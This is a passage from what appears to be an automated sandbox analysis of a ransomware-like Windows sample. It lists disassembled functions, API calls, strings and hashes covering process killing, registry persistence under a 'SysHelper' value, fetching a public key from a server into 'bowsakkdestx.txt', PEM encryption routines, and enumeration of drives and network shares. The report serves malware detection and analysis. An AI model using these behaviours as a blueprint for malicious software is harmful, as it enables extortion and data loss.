                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                      • String ID: cmd.exe
                                                                                      • API String ID: 2696918072-723907552
                                                                                      • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                      • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                      • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040F310, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressLibraryLoadProc
                                                                                      • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                      • API String ID: 2574300362-2555811374
                                                                                      • Opcode ID: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                      • Opcode Fuzzy Hash: be864d8308790b92be5507a70b6add5af3086b64f5ec129cc261dae8a5d69eb3
                                                                                      • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040CBA0, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                      • API String ID: 1783060780-3771355929
                                                                                      • Opcode ID: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                      • Opcode Fuzzy Hash: 03c951cbcffbb22e4b904cab30c58fb638dd7e4556e50294ac70ee7de3450d71
                                                                                      • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00463350, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _strncmp
                                                                                      • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                      • API String ID: 909875538-2908105608
                                                                                      • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                      • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                      • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C6A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                      • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseValue$OpenQuery
                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                      • API String ID: 3962714758-1667468722
                                                                                      • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                      • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                      • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0041E6E8, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0041E707
                                                                                        • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • InternetOpenW.WININET ref: 0041E743
                                                                                      • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                      • _memmove.LIBCMT ref: 0041E838
                                                                                      • lstrcpyW.KERNEL32 ref: 0041E90A
                                                                                      • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                      • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                      • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                      • _strstr.LIBCMT ref: 0041EA36
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                      • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                      • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                      • lstrcpyW.KERNEL32 ref: 0041EB5B
                                                                                      • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                      • _malloc.LIBCMT ref: 0041EB86
                                                                                      • _memset.LIBCMT ref: 0041EB94
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                      • lstrcpyW.KERNEL32 ref: 0041EBB6
                                                                                      • _strstr.LIBCMT ref: 0041EBDA
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                      • String ID: bowsakkdestx.txt${"public_key":"
                                                                                      • API String ID: 2805819797-1771568745
                                                                                      • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                      • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                      • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                      • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004573F0, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                      • API String ID: 1302938615-3129329331
                                                                                      • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                      • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                      • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004306EC, Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___unDName.LIBCMT ref: 0043071B
                                                                                      • _strlen.LIBCMT ref: 0043072E
                                                                                      • __lock.LIBCMT ref: 0043074A
                                                                                      • _malloc.LIBCMT ref: 0043075C
                                                                                      • _malloc.LIBCMT ref: 0043076D
                                                                                      • _free.LIBCMT ref: 004307B6
                                                                                        • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                      • _free.LIBCMT ref: 004307AF
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                      • String ID:
                                                                                      • API String ID: 3704956918-0
                                                                                      • Opcode ID: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                      • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                      • Opcode Fuzzy Hash: 36539338cfbcad0928be78389f669657de3690c66bdbd94f98a67f280fd4e95b
                                                                                      • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00425141, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __init_pointers.LIBCMT ref: 00425141
                                                                                        • Part of subcall function 00427D6C: RtlEncodePointer.NTDLL(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                        • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                        • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                        • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                      • __mtinitlocks.LIBCMT ref: 00425146
                                                                                      • __mtterm.LIBCMT ref: 0042514F
                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                        • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                        • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                      • __calloc_crt.LIBCMT ref: 00425174
                                                                                      • __initptd.LIBCMT ref: 00425196
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                      • String ID:
                                                                                      • API String ID: 3567560977-0
                                                                                      • Opcode ID: f4c69a70138d13d529c748345770976310cf81374b45ffcda2b41016945d7593
                                                                                      • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                                                                      • Opcode Fuzzy Hash: f4c69a70138d13d529c748345770976310cf81374b45ffcda2b41016945d7593
                                                                                      • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004253AE, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __lock.LIBCMT ref: 0042594A
                                                                                        • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                                                                        • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                                                                        • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                                                                      • _free.LIBCMT ref: 00425970
                                                                                        • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                        • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                      • __lock.LIBCMT ref: 00425989
                                                                                      • ___removelocaleref.LIBCMT ref: 00425998
                                                                                      • ___freetlocinfo.LIBCMT ref: 004259B1
                                                                                      • _free.LIBCMT ref: 004259C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                      • String ID:
                                                                                      • API String ID: 626533743-0
                                                                                      • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                      • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                                                                      • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                                                                      • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004506A0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                      • API String ID: 601868998-2416195885
                                                                                      • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                      • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0045AE30, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                      • API String ID: 2102423945-3653307630
                                                                                      • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                      • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00462FF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fprintf_memset
                                                                                      • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                      • API String ID: 3021507156-3399676524
                                                                                      • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                      • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040C500, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                      • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00410BD0, Relevance: 7.7, APIs: 5, Instructions: 234sharememoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                      • String ID:
                                                                                      • API String ID: 364255426-0
                                                                                      • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                      • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004416EB, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getenv_helper_nolock.LIBCMT ref: 00441726
                                                                                      • _strlen.LIBCMT ref: 00441734
                                                                                        • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                      • _strnlen.LIBCMT ref: 004417BF
                                                                                      • __lock.LIBCMT ref: 004417D0
                                                                                      • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                      • String ID:
                                                                                      • API String ID: 2168648987-0
                                                                                      • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                      • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                                                                                      • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                      • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00410A50, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
